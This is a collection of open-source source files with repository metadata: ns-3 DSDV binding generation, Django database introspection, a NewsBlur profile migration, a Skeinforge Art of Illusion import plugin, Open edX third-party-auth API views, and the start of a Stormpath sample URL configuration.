            ('GetHop', 'uint32_t'),
            ('GetInterface', 'ns3::Ipv4InterfaceAddress'),
            ('GetLifeTime', 'ns3::Time'),
            ('GetNextHop', 'ns3::Ipv4Address'),
            ('GetOutputDevice', 'ns3::Ptr< ns3::NetDevice >'),
            ('GetRoute', 'ns3::Ptr< ns3::Ipv4Route >'),
            ('GetSeqNo', 'uint32_t'),
            ('GetSettlingTime', 'ns3::Time')):
        cls.add_method(accessor, return_type, [], is_const=True)
    # void Print(Ptr<OutputStreamWrapper> stream) const
    cls.add_method('Print', 'void',
                   [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
                   is_const=True)
    # One-argument void mutators, registered in the original declaration order.
    for mutator, arg_type, arg_name in (
            ('SetEntriesChanged', 'bool', 'entriesChanged'),
            ('SetFlag', 'ns3::dsdv::RouteFlags', 'flag'),
            ('SetHop', 'uint32_t', 'hopCount'),
            ('SetInterface', 'ns3::Ipv4InterfaceAddress', 'iface'),
            ('SetLifeTime', 'ns3::Time', 'lifeTime'),
            ('SetNextHop', 'ns3::Ipv4Address', 'nextHop'),
            ('SetOutputDevice', 'ns3::Ptr< ns3::NetDevice >', 'device'),
            ('SetRoute', 'ns3::Ptr< ns3::Ipv4Route >', 'route'),
            ('SetSeqNo', 'uint32_t', 'sequenceNumber'),
            ('SetSettlingTime', 'ns3::Time', 'settlingTime')):
        cls.add_method(mutator, 'void', [param(arg_type, arg_name)])
    return
def register_functions(root_module):
    """Register free functions for every nested namespace of the root ns-3 module."""
    # Delegate to the per-namespace helpers, handing each its own submodule.
    for helper, submodule_name in (
            (register_functions_ns3_FatalImpl, 'FatalImpl'),
            (register_functions_ns3_Hash, 'Hash'),
            (register_functions_ns3_dsdv, 'dsdv')):
        helper(root_module.get_submodule(submodule_name), root_module)
    return
def register_functions_ns3_FatalImpl(module, root_module):
    """No free functions to register in the ns3::FatalImpl namespace."""
    pass
def register_functions_ns3_Hash(module, root_module):
    """Register ns3::Hash free functions by recursing into the Function sub-namespace."""
    function_submodule = module.get_submodule('Function')
    register_functions_ns3_Hash_Function(function_submodule, root_module)
def register_functions_ns3_Hash_Function(module, root_module):
    """No free functions to register in the ns3::Hash::Function namespace."""
    pass
def register_functions_ns3_dsdv(module, root_module):
    """No free functions to register in the ns3::dsdv namespace."""
    pass
def main():
    """Build the full dsdv module description and emit the binding code to stdout."""
    sink = FileCodeSink(sys.stdout)
    root_module = module_init()
    # Registration must run in dependency order: types first, then the
    # methods on those types, then free functions.
    for register in (register_types, register_methods, register_functions):
        register(root_module)
    root_module.generate(sink)
# Script entry point: generate the Python bindings when run directly.
if __name__ == '__main__':
    main()
| gpl-2.0 |
ttglennhall/DjangoGirlsTutorial | myvenv/lib/python3.4/site-packages/django/db/backends/base/introspection.py | 93 | 7354 | from collections import namedtuple
from django.utils import six
# Structure returned by DatabaseIntrospection.get_table_list()
TableInfo = namedtuple('TableInfo', ['name', 'type'])
# Structure returned by the DB-API cursor.description interface (PEP 249)
FieldInfo = namedtuple('FieldInfo',
'name type_code display_size internal_size precision scale null_ok')
class BaseDatabaseIntrospection(object):
    """
    This class encapsulates all backend-specific introspection utilities
    """
    # Maps backend type codes (the type_code values found in
    # cursor.description) to Django field class names; concrete backends
    # must populate this mapping.
    data_types_reverse = {}
    def __init__(self, connection):
        # `connection` is the database wrapper this introspector serves.
        self.connection = connection
    def get_field_type(self, data_type, description):
        """Hook for a database backend to use the cursor description to
        match a Django field type to a database column.
        For Oracle, the column data_type on its own is insufficient to
        distinguish between a FloatField and IntegerField, for example."""
        return self.data_types_reverse[data_type]
    def table_name_converter(self, name):
        """Apply a conversion to the name for the purposes of comparison.
        The default table name converter is for case sensitive comparison.
        """
        return name
    def column_name_converter(self, name):
        """
        Apply a conversion to the column name for the purposes of comparison.
        Uses table_name_converter() by default.
        """
        return self.table_name_converter(name)
    def table_names(self, cursor=None, include_views=False):
        """
        Returns a list of names of all tables that exist in the database.
        The returned table list is sorted by Python's default sorting. We
        do NOT use database's ORDER BY here to avoid subtle differences
        in sorting order between databases.
        """
        def get_names(cursor):
            # TableInfo.type is 't' for plain tables; views are kept only
            # when the caller explicitly asks for them.
            return sorted(ti.name for ti in self.get_table_list(cursor)
                          if include_views or ti.type == 't')
        if cursor is None:
            # No cursor supplied: open one and let the context manager close it.
            with self.connection.cursor() as cursor:
                return get_names(cursor)
        return get_names(cursor)
    def get_table_list(self, cursor):
        """
        Returns an unsorted list of TableInfo named tuples of all tables and
        views that exist in the database.
        """
        raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_table_list() method')
    def django_table_names(self, only_existing=False, include_views=True):
        """
        Returns a list of all table names that have associated Django models and
        are in INSTALLED_APPS.
        If only_existing is True, the resulting list will only include the tables
        that actually exist in the database.
        """
        # Imported lazily to avoid circular imports at module load time.
        from django.apps import apps
        from django.db import router
        tables = set()
        for app_config in apps.get_app_configs():
            for model in router.get_migratable_models(app_config, self.connection.alias):
                if not model._meta.managed:
                    # Unmanaged models have no Django-controlled table.
                    continue
                tables.add(model._meta.db_table)
                # Auto-created many-to-many join tables count as well.
                tables.update(f.m2m_db_table() for f in model._meta.local_many_to_many)
        tables = list(tables)
        if only_existing:
            existing_tables = self.table_names(include_views=include_views)
            tables = [
                t
                for t in tables
                if self.table_name_converter(t) in existing_tables
            ]
        return tables
    def installed_models(self, tables):
        "Returns a set of all models represented by the provided list of table names."
        from django.apps import apps
        from django.db import router
        all_models = []
        for app_config in apps.get_app_configs():
            all_models.extend(router.get_migratable_models(app_config, self.connection.alias))
        # Normalize both sides with the backend's name converter before comparing.
        tables = list(map(self.table_name_converter, tables))
        return {
            m for m in all_models
            if self.table_name_converter(m._meta.db_table) in tables
        }
    def sequence_list(self):
        "Returns a list of information about all DB sequences for all models in all apps."
        from django.apps import apps
        from django.db import models, router
        sequence_list = []
        for app_config in apps.get_app_configs():
            for model in router.get_migratable_models(app_config, self.connection.alias):
                if not model._meta.managed:
                    continue
                if model._meta.swapped:
                    # Swapped-out models are handled by their replacement.
                    continue
                for f in model._meta.local_fields:
                    if isinstance(f, models.AutoField):
                        sequence_list.append({'table': model._meta.db_table, 'column': f.column})
                        break  # Only one AutoField is allowed per model, so don't bother continuing.
                for f in model._meta.local_many_to_many:
                    # If this is an m2m using an intermediate table,
                    # we don't need to reset the sequence.
                    if f.rel.through is None:
                        sequence_list.append({'table': f.m2m_db_table(), 'column': None})
        return sequence_list
    def get_key_columns(self, cursor, table_name):
        """
        Backends can override this to return a list of (column_name, referenced_table_name,
        referenced_column_name) for all key columns in given table.
        """
        raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_key_columns() method')
    def get_primary_key_column(self, cursor, table_name):
        """
        Returns the name of the primary key column for the given table.
        """
        # get_indexes() maps column name -> infodict; scan for the PK entry.
        for column in six.iteritems(self.get_indexes(cursor, table_name)):
            if column[1]['primary_key']:
                return column[0]
        return None
    def get_indexes(self, cursor, table_name):
        """
        Returns a dictionary of indexed fieldname -> infodict for the given
        table, where each infodict is in the format:
            {'primary_key': boolean representing whether it's the primary key,
             'unique': boolean representing whether it's a unique index}
        Only single-column indexes are introspected.
        """
        raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_indexes() method')
    def get_constraints(self, cursor, table_name):
        """
        Retrieves any constraints or keys (unique, pk, fk, check, index)
        across one or more columns.
        Returns a dict mapping constraint names to their attributes,
        where attributes is a dict with keys:
         * columns: List of columns this covers
         * primary_key: True if primary key, False otherwise
         * unique: True if this is a unique constraint, False otherwise
         * foreign_key: (table, column) of target, or None
         * check: True if check constraint, False otherwise
         * index: True if index, False otherwise.
        Some backends may return special constraint names that don't exist
        if they don't name constraints of a certain type (e.g. SQLite)
        """
        raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_constraints() method')
| mit |
canwe/NewsBlur | apps/profile/migrations/0005_view_settings_to_preferences.py | 18 | 4350 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from django.contrib.auth.models import User
class Migration(DataMigration):
    # One-off data migration: each user's legacy `view_settings` JSON blob is
    # copied into the newer `preferences` field, and `view_settings` is reset
    # to an empty JSON object.
    def forwards(self, orm):
        # NOTE(review): iterates every user and saves one-by-one; acceptable
        # for a one-off migration, but O(n) queries on a large user table.
        users = User.objects.all()
        for user in users:
            user.profile.preferences = user.profile.view_settings
            user.profile.view_settings = '{}'
            user.profile.save()
    def backwards(self, orm):
        "Write your backwards methods here."
    # South's frozen model definitions, captured when this migration was written.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'profile.profile': {
            'Meta': {'object_name': 'Profile'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_seen_ip': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
            'last_seen_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'preferences': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
            'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
            'view_settings': ('django.db.models.fields.TextField', [], {'default': "'{}'"})
        }
    }
    complete_apps = ['profile']
| mit |
replicatorg/ReplicatorG | skein_engines/skeinforge-35/fabmetheus_utilities/fabmetheus_tools/interpret_plugins/xml_plugins/artofillusion.py | 8 | 11298 | """
This page is in the table of contents.
The xml.py script is an import translator plugin to get a carving from an Art of Illusion xml file.
An import plugin is a script in the interpret_plugins folder which has the function getCarving. It is meant to be run from the interpret tool. To ensure that the plugin works on platforms which do not handle file capitalization properly, give the plugin a lower case name.
The getCarving function takes the file name of an xml file and returns the carving.
This example gets a triangle mesh for the xml file boolean.xml. This example is run in a terminal in the folder which contains boolean.xml and xml.py.
> python
Python 2.5.1 (r251:54863, Sep 22 2007, 01:43:31)
[GCC 4.2.1 (SUSE Linux)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import xml
>>> xml.getCarving().getCarveRotatedBoundaryLayers()
[-1.159765625, None, [[(-18.925000000000001-2.4550000000000001j), (-18.754999999999981-2.4550000000000001j)
..
many more lines of the carving
..
An xml file can be exported from Art of Illusion by going to the "File" menu, then going into the "Export" menu item, then picking the XML choice. This will bring up the XML file chooser window, choose a place to save the file then click "OK". Leave the "compressFile" checkbox unchecked. All the objects from the scene will be exported, this plugin will ignore the light and camera. If you want to fabricate more than one object at a time, you can have multiple objects in the Art of Illusion scene and they will all be carved, then fabricated together.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.geometry.geometry_tools import face
from fabmetheus_utilities.geometry.manipulation_evaluator import matrix
from fabmetheus_utilities.geometry.geometry_utilities import boolean_geometry
from fabmetheus_utilities.geometry.geometry_utilities import booleansolid
from fabmetheus_utilities.geometry.solids import cube
from fabmetheus_utilities.geometry.solids import cylinder
from fabmetheus_utilities.geometry.solids import group
from fabmetheus_utilities.geometry.solids import sphere
from fabmetheus_utilities.geometry.solids import trianglemesh
from fabmetheus_utilities.vector3 import Vector3
from fabmetheus_utilities import euclidean
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__credits__ = 'Nophead <http://hydraraptor.blogspot.com/>\nArt of Illusion <http://www.artofillusion.org/>'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GPL 3.0'
def getCarvingFromParser( xmlParser ):
    "Build a BooleanGeometry carving from a parsed Art of Illusion xml tree."
    carving = boolean_geometry.BooleanGeometry()
    rootElement = xmlParser.getRoot()
    rootElement.object = carving
    # Drop bookkeeping attributes that carry no geometry information.
    euclidean.removeListFromDictionary( rootElement.attributeDictionary, ['fileversion', 'xmlns:bf'] )
    objectsElement = rootElement.getFirstChildWithClassName('Scene').getFirstChildWithClassName('objects')
    for element in objectsElement.getChildrenWithClassName('bf:Elem'):
        processXMLElement( carving.archivableObjects, rootElement, element )
    return carving
def getCarvableObject(globalObject, object, xmlElement):
    "Get new carvable object info."
    # Instantiate the carvable wrapper class and link it both ways to the
    # xml 'object' element it was built from.
    archivableObject = globalObject()
    archivableObject.xmlElement = object
    object.attributeDictionary['id'] = xmlElement.getFirstChildWithClassName('name').text
    object.object = archivableObject
    coords = xmlElement.getFirstChildWithClassName('coords')
    # Prefer the 'transformFrom' matrix; fall back to 'transformTo' when the
    # former does not carry a full 4x4 (16-entry) transform.
    transformXMLElement = getTransformXMLElement(coords, 'transformFrom')
    if len(transformXMLElement.attributeDictionary) < 16:
        transformXMLElement = getTransformXMLElement(coords, 'transformTo')
    # Copy the transform attributes into the object's 4x4 matrix.
    matrix.setXMLElementDictionaryToOtherElementDictionary( transformXMLElement, object.object.matrix4X4, '', object )
    return archivableObject
def getTransformXMLElement( coords, transformName ):
    "Get the transform attributes, chasing a bf:ref indirection when present."
    transformElement = coords.getFirstChildWithClassName( transformName )
    attributes = transformElement.attributeDictionary
    # Fewer than 16 attributes means the element is not a full 4x4 matrix;
    # it may instead reference another element that holds the real transform.
    if len( attributes ) < 16 and 'bf:ref' in attributes:
        return coords.getRoot().getSubChildWithID( attributes['bf:ref'] )
    return transformElement
def processXMLElement( archivableObjects, parent, xmlElement ):
    """Append a carvable object parsed from xmlElement to archivableObjects.

    Silently ignores elements that are missing, untyped, or whose shape type
    this plugin cannot carve (e.g. lights and cameras).
    """
    # Idiom fix: compare to None with `is`, not `==` (PEP 8).
    if xmlElement is None:
        return
    object = xmlElement.getFirstChildWithClassName('object')
    if 'bf:type' not in object.attributeDictionary:
        return
    shapeType = object.attributeDictionary['bf:type']
    if shapeType not in globalCarvableClassObjectTable:
        # Not a carvable shape type: skip it.
        return
    carvableClassObject = globalCarvableClassObjectTable[ shapeType ]
    archivableObject = getCarvableObject( carvableClassObject, object, xmlElement )
    # Propagate visibility, populate the shape, and hook up the tree links.
    archivableObject.xmlElement.attributeDictionary['visible'] = xmlElement.attributeDictionary['visible']
    archivableObject.setToObjectAttributeDictionary()
    archivableObject.xmlElement.parent = parent
    archivableObjects.append(archivableObject)
def removeListArtOfIllusionFromDictionary( dictionary, scrubKeys ):
    "Remove the Art of Illusion bookkeeping keys plus the caller's scrub keys from the dictionary."
    for keyList in ( ['bf:id', 'bf:type'], scrubKeys ):
        euclidean.removeListFromDictionary( dictionary, keyList )
class BooleanSolid( booleansolid.BooleanSolid ):
    "An Art of Illusion CSG object info."
    def setToObjectAttributeDictionary(self):
        "Set the shape of this carvable object info."
        # Recursively parse both operands of the CSG operation.
        processXMLElement( self.archivableObjects, self.xmlElement, self.xmlElement.getFirstChildWithClassName('obj1') )
        processXMLElement( self.archivableObjects, self.xmlElement, self.xmlElement.getFirstChildWithClassName('obj2') )
        operationString = self.xmlElement.attributeDictionary['operation']
        # Art of Illusion encodes the CSG operation as a digit string;
        # '2' and '3' both map to difference, with '3' reversing operand order below.
        self.operationFunction = { '0': self.getUnion, '1': self.getIntersection, '2': self.getDifference, '3': self.getDifference }[ operationString ]
        if operationString == '3':
            self.archivableObjects.reverse()
        removeListArtOfIllusionFromDictionary( self.xmlElement.attributeDictionary, ['operation'] )
class Cube( cube.Cube ):
    "An Art of Illusion Cube object."
    def setToObjectAttributeDictionary(self):
        "Translate the Art of Illusion half-extent attributes into the cube inradius, then build the shape."
        attributes = self.xmlElement.attributeDictionary
        self.inradius = Vector3(
            float( attributes['halfx'] ),
            float( attributes['halfy'] ),
            float( attributes['halfz'] ) )
        # Mirror the half extents under the canonical 'inradius.*' keys, then
        # scrub the Art of Illusion specific originals.
        for axis, halfKey in [ ('x', 'halfx'), ('y', 'halfy'), ('z', 'halfz') ]:
            attributes['inradius.' + axis] = attributes[ halfKey ]
        removeListArtOfIllusionFromDictionary( attributes, ['halfx', 'halfy', 'halfz'] )
        self.createShape()
class Cylinder(cylinder.Cylinder):
    "An Art of Illusion Cylinder object."
    def setToObjectAttributeDictionary(self):
        "Set the shape of this carvable object info."
        # Note the axis shuffle: the file's rz becomes inradius.y and the
        # height becomes inradius.z.
        self.inradius = Vector3()
        self.inradius.x = float(self.xmlElement.attributeDictionary['rx'])
        self.inradius.y = float(self.xmlElement.attributeDictionary['rz'])
        self.inradius.z = float(self.xmlElement.attributeDictionary['height'])
        # 'ratio' from the file is stored as topOverBottom (taper of the cylinder).
        self.topOverBottom = float(self.xmlElement.attributeDictionary['ratio'])
        self.xmlElement.attributeDictionary['radius.x'] = self.xmlElement.attributeDictionary['rx']
        self.xmlElement.attributeDictionary['radius.y'] = self.xmlElement.attributeDictionary['rz']
        self.xmlElement.attributeDictionary['topoverbottom'] = self.xmlElement.attributeDictionary['ratio']
        object = self.xmlElement.object
        # Pre-multiply a 90-degree axis-switch on axes 0 and 2; presumably this
        # maps Art of Illusion's cylinder axis onto this package's convention
        # -- TODO confirm against matrix.getDiagonalSwitchedTetragrid.
        object.matrix4X4 = object.matrix4X4.getOtherTimesSelf(matrix.getDiagonalSwitchedTetragrid(90.0, [0, 2]))
        removeListArtOfIllusionFromDictionary(self.xmlElement.attributeDictionary, ['rx', 'rz', 'ratio'])
        self.createShape()
class Group( group.Group ):
    "An Art of Illusion Group object."
    def setToObjectAttributeDictionary(self):
        "Parse every child element of this group into its own carvable object."
        # The group's members live on the sibling 'children' element of the parent node.
        childrenElement = self.xmlElement.parent.getFirstChildWithClassName('children')
        for childElement in childrenElement.getChildrenWithClassName('bf:Elem'):
            processXMLElement( self.archivableObjects, self.xmlElement, childElement )
        removeListArtOfIllusionFromDictionary( self.xmlElement.attributeDictionary, [] )
class Sphere( sphere.Sphere ):
    "An Art of Illusion Sphere object."
    def setToObjectAttributeDictionary(self):
        "Translate the Art of Illusion per-axis radii into the sphere radius, then build the shape."
        attributes = self.xmlElement.attributeDictionary
        self.radius = Vector3(
            float( attributes['rx'] ),
            float( attributes['ry'] ),
            float( attributes['rz'] ) )
        # Rename the per-axis radii to the canonical 'radius.*' keys before
        # scrubbing the Art of Illusion originals.
        for axis in 'xyz':
            attributes['radius.' + axis] = attributes['r' + axis]
        removeListArtOfIllusionFromDictionary( attributes, ['rx', 'ry', 'rz'] )
        self.createShape()
class TriangleMesh( trianglemesh.TriangleMesh ):
    "An Art of Illusion triangle mesh object."
    def setToObjectAttributeDictionary(self):
        "Set the shape of this carvable object info."
        # Vertices: each 'bf:Elem' carries its coordinates on a nested 'r' child.
        vertexElement = self.xmlElement.getFirstChildWithClassName('vertex')
        vertexPointElements = vertexElement.getChildrenWithClassName('bf:Elem')
        for vertexPointElement in vertexPointElements:
            coordinateElement = vertexPointElement.getFirstChildWithClassName('r')
            vertex = Vector3( float( coordinateElement.attributeDictionary['x'] ), float( coordinateElement.attributeDictionary['y'] ), float( coordinateElement.attributeDictionary['z'] ) )
            self.vertexes.append(vertex)
        # Edges: pairs of vertex indices (v1, v2), indexed by list position.
        edgeElement = self.xmlElement.getFirstChildWithClassName('edge')
        edgeSubelements = edgeElement.getChildrenWithClassName('bf:Elem')
        for edgeSubelementIndex in xrange( len( edgeSubelements ) ):
            edgeSubelement = edgeSubelements[ edgeSubelementIndex ]
            vertexIndexes = [ int( edgeSubelement.attributeDictionary['v1'] ), int( edgeSubelement.attributeDictionary['v2'] ) ]
            edge = face.Edge().getFromVertexIndexes( edgeSubelementIndex, vertexIndexes )
            self.edges.append( edge )
        # Faces: triples of edge indices (e1, e2, e3) resolved against self.edges.
        faceElement = self.xmlElement.getFirstChildWithClassName('face')
        faceSubelements = faceElement.getChildrenWithClassName('bf:Elem')
        for faceSubelementIndex in xrange( len( faceSubelements ) ):
            faceSubelement = faceSubelements[ faceSubelementIndex ]
            edgeIndexes = [ int( faceSubelement.attributeDictionary['e1'] ), int( faceSubelement.attributeDictionary['e2'] ), int( faceSubelement.attributeDictionary['e3'] ) ]
            self.faces.append( face.Face().getFromEdgeIndexes( edgeIndexes, self.edges, faceSubelementIndex ) )
        removeListArtOfIllusionFromDictionary( self.xmlElement.attributeDictionary, ['closed', 'smoothingMethod'] )
# Dispatch table: Art of Illusion 'bf:type' attribute value -> carvable wrapper class.
globalCarvableClassObjectTable = { 'CSGObject' : BooleanSolid, 'Cube' : Cube, 'Cylinder' : Cylinder, 'artofillusion.object.NullObject' : Group, 'Sphere' : Sphere, 'TriangleMesh' : TriangleMesh }
| gpl-2.0 |
Stanford-Online/edx-platform | common/djangoapps/third_party_auth/api/views.py | 20 | 8981 | """
Third Party Auth REST API views
"""
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import Http404
from rest_framework import exceptions, status
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework_oauth.authentication import OAuth2Authentication
from social_django.models import UserSocialAuth
from openedx.core.lib.api.authentication import (
OAuth2AuthenticationAllowInactiveUser,
SessionAuthenticationAllowInactiveUser
)
from openedx.core.lib.api.permissions import ApiKeyHeaderPermission
from third_party_auth import pipeline
from third_party_auth.api import serializers
from third_party_auth.api.permissions import ThirdPartyAuthProviderApiPermission
from third_party_auth.provider import Registry
class UserView(APIView):
    """
    List the third party auth accounts linked to the specified user account.
    **Example Request**
        GET /api/third_party_auth/v0/users/{username}
    **Response Values**
        If the request for information about the user is successful, an HTTP 200 "OK" response
        is returned.
        The HTTP 200 response has the following values.
        * active: A list of all the third party auth providers currently linked
          to the given user's account. Each object in this list has the
          following attributes:
            * provider_id: The unique identifier of this provider (string)
            * name: The name of this provider (string)
            * remote_id: The ID of the user according to the provider. This ID
              is what is used to link the user to their edX account during
              login.
    """
    authentication_classes = (
        # Users may want to view/edit the providers used for authentication before they've
        # activated their account, so we allow inactive users.
        OAuth2AuthenticationAllowInactiveUser,
        SessionAuthenticationAllowInactiveUser,
    )
    def get(self, request, username):
        """List the third party auth providers linked to the given user.
        Args:
            request (Request): The HTTP GET request
            username (str): Fetch the list of providers linked to this user
        Return:
            JSON serialized list of the providers linked to this user.
        """
        if request.user.username != username:
            # We are querying permissions for a user other than the current user.
            if not request.user.is_superuser and not ApiKeyHeaderPermission().has_permission(request, self):
                # Return a 403 (Forbidden) without validating 'username', so that we
                # do not let users probe the existence of other user accounts.
                return Response(status=status.HTTP_403_FORBIDDEN)
        try:
            user = User.objects.get(username=username)
        except User.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        providers = pipeline.get_provider_user_states(user)
        # Keep only the provider states that actually have a linked account.
        active_providers = [
            {
                "provider_id": assoc.provider.provider_id,
                "name": assoc.provider.name,
                "remote_id": assoc.remote_id,
            }
            for assoc in providers if assoc.has_account
        ]
        # In the future this can be trivially modified to return the inactive/disconnected providers as well.
        return Response({
            "active": active_providers
        })
class UserMappingView(ListAPIView):
    """
    Map between the third party auth account IDs (remote_id) and EdX username.
    This API is intended to be a server-to-server endpoint. An on-campus middleware or system should consume this.
    **Use Case**
        Get a paginated list of mappings between edX users and remote user IDs for all users currently
        linked to the given backend.
        The list can be filtered by edx username or third party ids. The filter is limited by the max length of URL.
        It is suggested to query no more than 50 usernames or remote_ids in each request to stay within above
        limitation
        The page size can be changed by specifying `page_size` parameter in the request.
    **Example Requests**
        GET /api/third_party_auth/v0/providers/{provider_id}/users
        GET /api/third_party_auth/v0/providers/{provider_id}/users?username={username1},{username2}
        GET /api/third_party_auth/v0/providers/{provider_id}/users?username={username1}&usernames={username2}
        GET /api/third_party_auth/v0/providers/{provider_id}/users?remote_id={remote_id1},{remote_id2}
        GET /api/third_party_auth/v0/providers/{provider_id}/users?remote_id={remote_id1}&remote_id={remote_id2}
        GET /api/third_party_auth/v0/providers/{provider_id}/users?username={username1}&remote_id={remote_id1}
    **URL Parameters**
        * provider_id: The unique identifier of third_party_auth provider (e.g. "saml-ubc", "oa2-google", etc.
          This is not the same thing as the backend_name.). (Optional/future: We may also want to allow
          this to be an 'external domain' like 'ssl:MIT' so that this API can also search the legacy
          ExternalAuthMap table used by Stanford/MIT)
    **Query Parameters**
        * remote_ids: Optional. List of comma separated remote (third party) user IDs to filter the result set.
          e.g. ?remote_ids=8721384623
        * usernames: Optional. List of comma separated edX usernames to filter the result set.
          e.g. ?usernames=bob123,jane456
        * page, page_size: Optional. Used for paging the result set, especially when getting
          an unfiltered list.
    **Response Values**
        If the request for information about the user is successful, an HTTP 200 "OK" response
        is returned.
        The HTTP 200 response has the following values:
        * count: The number of mappings for the backend.
        * next: The URI to the next page of the mappings.
        * previous: The URI to the previous page of the mappings.
        * num_pages: The number of pages listing the mappings.
        * results:  A list of mappings returned. Each collection in the list
          contains these fields.
            * username: The edx username
            * remote_id: The Id from third party auth provider
    """
    authentication_classes = (
        OAuth2Authentication,
    )
    serializer_class = serializers.UserMappingSerializer
    provider = None
    def get_queryset(self):
        """Build the filtered UserSocialAuth queryset for the requested provider."""
        provider_id = self.kwargs.get('provider_id')
        # permission checking. We allow both API_KEY access and OAuth2 client credential access
        if not (
            self.request.user.is_superuser or ApiKeyHeaderPermission().has_permission(self.request, self) or
            ThirdPartyAuthProviderApiPermission(provider_id).has_permission(self.request, self)
        ):
            raise exceptions.PermissionDenied()
        # provider existence checking
        self.provider = Registry.get(provider_id)
        if not self.provider:
            raise Http404
        query_set = UserSocialAuth.objects.select_related('user').filter(provider=self.provider.backend_name)
        # When using multi-IdP backend, we only retrieve the ones that are for current IdP.
        # Test if the current provider has a slug: get_social_auth_uid prefixes
        # the value with the slug when one is configured, so a changed result
        # means slugged uids.
        # BUG FIX: the original used `uid is not 'uid'`, comparing strings by
        # object identity; that only worked by accident of CPython interning.
        uid = self.provider.get_social_auth_uid('uid')
        if uid != 'uid':
            # Filter the uid column on the slug prefix (strip the 'uid' probe suffix).
            query_set = query_set.filter(uid__startswith=uid[:-3])
        query = Q()
        usernames = self.request.query_params.getlist('username', None)
        remote_ids = self.request.query_params.getlist('remote_id', None)
        if usernames:
            # Accept both repeated parameters and comma-separated lists.
            usernames = ','.join(usernames)
            usernames = set(usernames.split(',')) if usernames else set()
            if usernames:
                query = query | Q(user__username__in=usernames)
        if remote_ids:
            remote_ids = ','.join(remote_ids)
            remote_ids = set(remote_ids.split(',')) if remote_ids else set()
            if remote_ids:
                query = query | Q(uid__in=[self.provider.get_social_auth_uid(remote_id) for remote_id in remote_ids])
        return query_set.filter(query)
    def get_serializer_context(self):
        """
        Extra context provided to the serializer class with current provider. We need the provider to
        remove idp_slug from the remote_id if there is any
        """
        context = super(UserMappingView, self).get_serializer_context()
        context['provider'] = self.provider
        return context
| agpl-3.0 |
stormpath/stormpath-python-samples | project/urls.py | 1 | 1098 | from django.conf.urls import patterns, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
# URLconf for the chirper sample app: Stormpath-backed auth (login/logout/
# signup/password reset), profile management, and chirp list/delete views,
# all referenced by dotted view path (pre-Django-1.8 style).
urlpatterns = patterns('',
    url(r'^$', 'chirper.views.home', name='home'),
    url(r'^login/$', 'chirper.views.stormpath_login', name='login'),
    url(r'^logout/$', 'chirper.views.stormpath_logout', name='logout'),
    url(r'^signup/$', 'chirper.views.signup', name='signup'),
    url(r'^password/send/$', 'chirper.views.send_password_token',
        name='password_send'),
    url(r'^password/reset', 'chirper.views.reset_password',
        name='password_reset'),
    url(r'^profile/$', 'chirper.views.update_user', name='profile'),
    url(r'^chirps/delete/(\d+)/$', 'chirper.views.delete_chirp',
        name='chirp_delete'),
